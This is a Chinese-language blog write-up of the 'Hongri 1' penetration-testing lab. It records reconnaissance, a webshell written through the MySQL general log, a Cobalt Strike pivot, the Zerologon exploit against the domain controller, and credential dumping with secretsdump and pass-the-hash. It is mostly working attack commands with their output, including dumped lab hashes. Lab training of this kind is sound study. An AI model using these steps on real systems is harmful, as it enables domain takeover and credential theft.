红日1

红日1

环境

1
2
3
4
Windows11攻击机:192.168.44.142
Windows7(web服务器):192.168.44.141192.168.52.143
Windows2008(DC):192.168.52.138
Win2k3192.168.52.141

image-20251211115725818

外网信息收集

nmap扫描

扫描存活主机

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nmap -sn 192.168.44.0/24


└─# nmap -sn 192.168.44.0/24 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-03 06:06 EST
Nmap scan report for 192.168.44.1
Host is up (0.00023s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.44.2
Host is up (0.00018s latency).
MAC Address: 00:50:56:E0:12:92 (VMware)
Nmap scan report for 192.168.44.141
Host is up (0.00035s latency).
MAC Address: 00:0C:29:59:B3:A5 (VMware)
Nmap scan report for 192.168.44.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:ED:12:ED (VMware)
Nmap scan report for 192.168.44.142
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 18.47 seconds

192.168.44.141是新增加的主机,为我们的靶机

端口扫描

1
2
3
4
nmap --min-rate 10000 -p- 192.168.44.141
nmap -sT -sV -sC -O -p80,135,139,445,1025,1026,1027,1028,1029,1057,3306 192.168.44.141 -Pn
nmap -sU --top-ports 100 192.168.44.141
nmap --script=vuln -p80,135,139,445,1025,1026,1027,1028,1029,1057,3306  192.168.44.141
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.44.141
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-03 06:13 EST
Nmap scan report for 192.168.44.141
Host is up (0.00092s latency).
Not shown: 65524 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1028/tcp open  unknown
1029/tcp open  ms-lsa
1057/tcp open  startron
3306/tcp open  mysql
MAC Address: 00:0C:29:59:B3:A5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.93 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
┌──(root㉿kali)-[~]
└─# nmap -sT -sV -sC -O -p80,135,139,445,1025,1026,1027,1028,1029,1057,3306 192.168.44.141 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-03 06:16 EST
Nmap scan report for 192.168.44.141
Host is up (0.00046s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: phpStudy \xE6\x8E\xA2\xE9\x92\x88 2014 
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
1029/tcp open  msrpc        Microsoft Windows RPC
1057/tcp open  msrpc        Microsoft Windows RPC
3306/tcp open  mysql        MySQL (unauthorized)
MAC Address: 00:0C:29:59:B3:A5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows 2008|7|Vista|8.1
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Vista SP2 or Windows 7 or Windows Server 2008 R2 or Windows 8.1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-11-03T11:17:18
|_  start_date: 2025-11-03T10:07:34
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:59:b3:a5 (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: stu1
|   NetBIOS computer name: STU1\x00
|   Domain name: god.org
|   Forest name: god.org
|   FQDN: stu1.god.org
|_  System time: 2025-11-03T19:17:18+08:00
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p80,135,139,445,1025,1026,1027,1028,1029,1057,3306  192.168.44.141

Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-03 06:16 EST
Nmap scan report for 192.168.44.141
Host is up (0.00048s latency).

PORT     STATE SERVICE
80/tcp   open  http
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.44.141:80/l.php?act=Function%27%20OR%20sqlspider
|     http://192.168.44.141:80/l.php?act=phpinfo%27%20OR%20sqlspider
|     http://192.168.44.141:80/l.php?act=Function%27%20OR%20sqlspider
|     http://192.168.44.141:80/l.php?act=phpinfo%27%20OR%20sqlspider
|     http://192.168.44.141:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000%27%20OR%20sqlspider
|     http://192.168.44.141:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|     http://192.168.44.141:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42%27%20OR%20sqlspider
|   Possible sqli for forms:
|     Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|       funName
|     Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
|       host
|       port
|       login
|_      funName
| http-phpself-xss: 
|   VULNERABLE:
|   Unsafe use of $_SERVER["PHP_SELF"] in PHP files
|     State: VULNERABLE (Exploitable)
|       PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|              
|     Extra information:
|       
|   Vulnerable files with proof of concept:
|     http://192.168.44.141/l.php/%27%22/%3E%3Cscript%3Ealert(1)%3C/script%3E
|   Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.44.141
|     References:
|       http://php.net/manual/en/reserved.variables.server.php
|_      https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /phpinfo.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /phpMyAdmin/: phpMyAdmin
|_  /PHPMyAdmin/: phpMyAdmin
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.44.141
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.44.141:80/
|     Form id: 
|     Form action: /l.php#bottom
|     
|     Path: http://192.168.44.141:80/l.php
|     Form id: 
|_    Form action: /l.php#bottom
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1028/tcp open  unknown
1029/tcp open  ms-lsa
1057/tcp open  startron
3306/tcp open  mysql
MAC Address: 00:0C:29:59:B3:A5 (VMware)

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

Nmap done: 1 IP address (1 host up) scanned in 133.90 seconds

根据默认脚本扫描,发现多个漏洞

1
2
3
MS17-010 (永恒之蓝)
SQL注入
XSS跨站脚本

gobuster

目录扫描

1
gobuster dir -u http://192.168.44.141/ -w /usr/share/wordlists/dirb/big.txt -t 50 -f -q
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.44.141/ -w /usr/share/wordlists/dirb/big.txt -t 50 -f -q
/.htaccess/           (Status: 403) [Size: 219]
/.htpasswd/           (Status: 403) [Size: 219]
/aux/                 (Status: 403) [Size: 213]
/com1/                (Status: 403) [Size: 214]
/com2/                (Status: 403) [Size: 214]
/com4/                (Status: 403) [Size: 214]
/com3/                (Status: 403) [Size: 214]
/con/                 (Status: 403) [Size: 213]
/lpt2/                (Status: 403) [Size: 214]
/lpt1/                (Status: 403) [Size: 214]
/nul/                 (Status: 403) [Size: 213]
/phpMyAdmin/          (Status: 200) [Size: 4378]
/phpmyadmin/          (Status: 200) [Size: 4378]
/prn/                 (Status: 403) [Size: 213]
/secci�/              (Status: 403) [Size: 216]

发现/phpMyAdmin/存在

试试弱密码

1
root:root

成功登录

image-20251103193045181

最后确认攻击优先级

1
80端口->/phpMyAdmin->MS17-010->SQL注入

外网渗透

数据库getshell

首先访问80端口

是一个php探针

image-20251103193607392

其中显示绝对路径为

1
C:/phpStudy/WWW

再访问http://192.168.44.141/phpMyAdmin

查看日志状态

1
show variables like '%general%'

image-20251103193934768

尝试修改

1
2
SET GLOBAL general_log='on'
SET GLOBAL general_log_file='C:/phpStudy/www/w.php'

image-20251103194200907

测试select "<?php phpinfo();?>"

http://192.168.44.141/w.php

image-20251103194426667

写shell

1
SELECT "<?php phpinfo();@eval($_POST['cmd'])?>"

蚁剑连接

image-20251103194726804

命令行查看权限,发现为管理员,且存在域

image-20251103194831041

发现另一张网卡,应该是域

image-20251103195031041

至此,外网结束,进入内网

内网渗透

1
2
3
4
net view //查询域用户
net view /domain //查看域数量
echo %logonserver%  //域管登录主机
ipconfig /all | findstr "DNS" //查dns,一般dns为dc

经过收集,得到以下信息

1
2
3
4
域名:god.org
STU1(当前控制主机):192.168.44.141192.168.52.143
owa(域控):192.168.52.138
ROOT-TVI862UBEH(成员):192.168.52.141

上线cs

设置监听器生成可执行文件并用蚁剑上传并执行

image-20251103202618492

image-20251103201033963

修改sleep

1
sleep 0

通过cs获取的信息域命令行获取的信息一致

image-20251103202859979

隧道代理

cs为1080端口启动代理

image-20251103210218812

kali设置

1
2
sudo vi /etc/proxychains4.conf
socks4  192.168.44.142 1080

cve-2020-1472

使用cve-2020-1472检测

1
proxychains python3 zerologon_tester.py OWA 192.168.52.138

image-20251103211014488

发现可以重制主机密码攻击

置空DC的密码

1
proxychains python3 cve-2020-1472-exploit.py OWA 192.168.52.138

image-20251103211501611

成功

获取HASH

使用impacket包中的secretsdum.py来获取相关的HASh

1
proxychains python3 secretsdump.py god.org/OWA\$@192.168.52.138 -no-pass
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.138:445  ...  OK
[*] Target system bootKey: 0x980de85005a72e9a8d7c401ee3d2363b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2e8b24e00bd703e52cfe327a072006b0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
GOD\OWA$:aes256-cts-hmac-sha1-96:10433e22e636484b9318ab9c730d53eb3b174e540449ea797514c456636b9762
GOD\OWA$:aes128-cts-hmac-sha1-96:1fe9d4117dd28cd340ce702e25f64a8a
GOD\OWA$:des-cbc-md5:623189f14389fd61
GOD\OWA$:plain_password_hex:375998bf4fe11a982ac0b53c25aba7daf8b022ad58eebf09db42de85b375da27398871680fa5e0ec61bf94b4e2c480c8fd11770a310e5fd3add64f336bcab7e9e99fcf6c976fd7e134c43c1b533c765422cf1bdfe2c3c7de12e75c0d71faa274d40e46f28a5c37cf3b15246bdbb2fba13b02e2e166ca7610aa72510613f225caadb7c37f97ba300c089fc1631a26081c65642871db4f8eed905e9aa77a9fb1a88694d026becd105a609d001525402e17591def7a2caad50c04befc800e9a36094fcb251f65f4227ea2253121262186a02232f0656107a59cb3f5badde45717bd9a6aab370dab3664a37351401b351119
GOD\OWA$:aad3b435b51404eeaad3b435b51404ee:75f17da3f75b5cc6b3da3978631b2e44:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x99a225f950e4b443c3104fd8decefa12f0ad7f53
dpapi_userkey:0x93c6670d6c538e0c31ed6a8bcf74550f46961386
[*] NL$KM 
 0000   25 43 63 20 92 1D 93 C5  E7 9E 92 E4 78 7D 3F D0   %Cc ........x}?.
 0010   44 7F 4E C2 C3 43 DF E2  6E 44 FD FF 36 D6 5F 4D   D.N..C..nD..6._M
 0020   9C E9 83 07 84 42 BF A7  91 59 4E 51 FE 4E 76 89   .....B...YNQ.Nv.
 0030   E1 99 3C 62 E4 CC 74 71  42 F8 86 02 BD A6 E8 87   ..<b..tqB.......
NL$KM:25436320921d93c5e79e92e4787d3fd0447f4ec2c343dfe26e44fdff36d65f4d9ce983078442bfa791594e51fe4e7689e1993c62e4cc747142f88602bda6e887
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.138:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.52.138:49155  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:58e91a5ac358d86513ab224312314061:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387:::
god.org\ligang:1106:aad3b435b51404eeaad3b435b51404ee:1e3d22f88dfd250c9312d21686c60f41:::
OWA$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ROOT-TVI862UBEH$:1104:aad3b435b51404eeaad3b435b51404ee:306f98801c27ab24434435b830b32154:::
STU1$:1105:aad3b435b51404eeaad3b435b51404ee:d68ace40ae4d91cffa9cf67130512d54:::
DEV1$:1107:aad3b435b51404eeaad3b435b51404ee:bed18e5b9d13bb384a3041a10d43c01b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:a6638af3b768efbd14fcc5eef9da5de9814a3e90b4f2ef6641f424d59017f53e
Administrator:aes128-cts-hmac-sha1-96:7f4f5b68adda68b55f56296b43558389
Administrator:des-cbc-md5:e9bfa498a7578c25
Administrator:rc4_hmac:42e2656ec24331269f82160ff5962387
krbtgt:aes256-cts-hmac-sha1-96:a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df
krbtgt:aes128-cts-hmac-sha1-96:2e35721544960f553afcba54252d7b13
krbtgt:des-cbc-md5:8cc1019b7ccd1319
krbtgt:rc4_hmac:58e91a5ac358d86513ab224312314061
liukaifeng01:aes256-cts-hmac-sha1-96:ab02c072b60573e375d0d37f72b7a2f8b3934c94fdcced4a122b94bc3acbdc5a
liukaifeng01:aes128-cts-hmac-sha1-96:e62dc797663bb1aee332eb1a580b7c55
liukaifeng01:des-cbc-md5:856e7f80a27a579b
liukaifeng01:rc4_hmac:42e2656ec24331269f82160ff5962387
god.org\ligang:aes256-cts-hmac-sha1-96:6c64f4839c02b73f7604fb86dfc3f015acbf3b9c82cc8c302b463ae1e6962d82
god.org\ligang:aes128-cts-hmac-sha1-96:587d041a1163870abc419487cea00e04
god.org\ligang:des-cbc-md5:57760e974551d592
god.org\ligang:rc4_hmac:1e3d22f88dfd250c9312d21686c60f41
OWA$:aes256-cts-hmac-sha1-96:ef4ee190931baf3a4d52637f865e1038dabc4dae790917e82644d259b49bfa8b
OWA$:aes128-cts-hmac-sha1-96:05eaf94d27ad24e849b83568e60e8ab3
OWA$:des-cbc-md5:ad0eaef73120f4ab
OWA$:rc4_hmac:31d6cfe0d16ae931b73c59d7e0c089c0
ROOT-TVI862UBEH$:aes256-cts-hmac-sha1-96:b3bf84c557e9c76269b443d155f5bbb67631e39e2869b821924db8d6649acc17
ROOT-TVI862UBEH$:aes128-cts-hmac-sha1-96:5865d64cefd47153996fb2b445b856f9
ROOT-TVI862UBEH$:des-cbc-md5:c7ef70f8f762a437
ROOT-TVI862UBEH$:rc4_hmac:306f98801c27ab24434435b830b32154
STU1$:aes256-cts-hmac-sha1-96:657d2fabd06fd3c610299497bc1d2233cb9fed42211e2067cac899074cf70e01
STU1$:aes128-cts-hmac-sha1-96:e8ad2657702a44f09c5547d095edb602
STU1$:des-cbc-md5:25855707ecd0e638
STU1$:rc4_hmac:d68ace40ae4d91cffa9cf67130512d54
DEV1$:aes256-cts-hmac-sha1-96:4e724c5cfb62bcab5e6baa5a5a36d638568dd5d91ee4a311c1feb4f5e40849ce
DEV1$:aes128-cts-hmac-sha1-96:9c68d7e02dac2dc0fa0f7aebfdbd1afb
DEV1$:des-cbc-md5:f8efa87a02802532
DEV1$:rc4_hmac:bed18e5b9d13bb384a3041a10d43c01b
[*] Cleaning up...

登录

1
proxychains python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:42e2656ec24331269f82160ff5962387 god/Administrator@192.168.52.138

成功接管dc

image-20251103212041253

导出sam

1
2
3
4
5
6
7
8
9
10
11
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
exit

从sam获取hash (这里获得的是本地管理员的hash)

1
2
python3 secretsdump.py -sam sam.save -system system.save -security security.save
LOCAL

image-20251103212859853

恢复原hash

1
proxychains python3 reinstall_original_pw.py OWA 192.168.52.138 75f17da3f75b5cc6b3da3978631b2e44

检测

1
proxychains python3 secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:75f17da3f75b5cc6b3da3978631b2e44 god.org/OWA\$@192.168.52.138

成功

image-20251103212702539

最终hash

1
2
3
4
5
6
7
8
9
10
11
域管理员哈希:

Administrator: 42e2656ec24331269f82160ff5962387

liukaifeng01: 42e2656ec24331269f82160ff5962387 (与Administrator相同哈希)

其他用户:

god.org\ligang: 1e3d22f88dfd250c9312d21686c60f41

krbtgt: 58e91a5ac358d86513ab224312314061
靶场
红日1
http://xiaowu5.cn/2025/12/11/红日1/
作者
5
发布于
2025年12月11日
许可协议
BY XIAOWU